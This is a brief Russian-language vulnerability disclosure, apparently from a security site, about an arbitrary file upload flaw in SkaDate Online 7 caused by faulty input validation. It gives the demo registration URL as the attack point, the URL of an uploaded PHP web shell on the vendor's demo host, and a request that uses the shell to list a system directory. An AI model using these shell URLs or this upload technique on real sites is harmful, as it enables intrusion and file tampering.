Программа: SkaDate Online 7

Найденная уязвимость позволяет перезаписать произвольные файлы на целевой
системе. Уязвимость существует из-за ошибки в проверке входных данных. Атакующий
может загрузить произвольные файлы на целевую систему (например, шелл).

Эксплоит:

http://www.skadate.com/demo/member/join.php

Шелл:

http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php

http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php?act=ls&d=%2Fetc%2Fvdomainaliases



Оставить мнение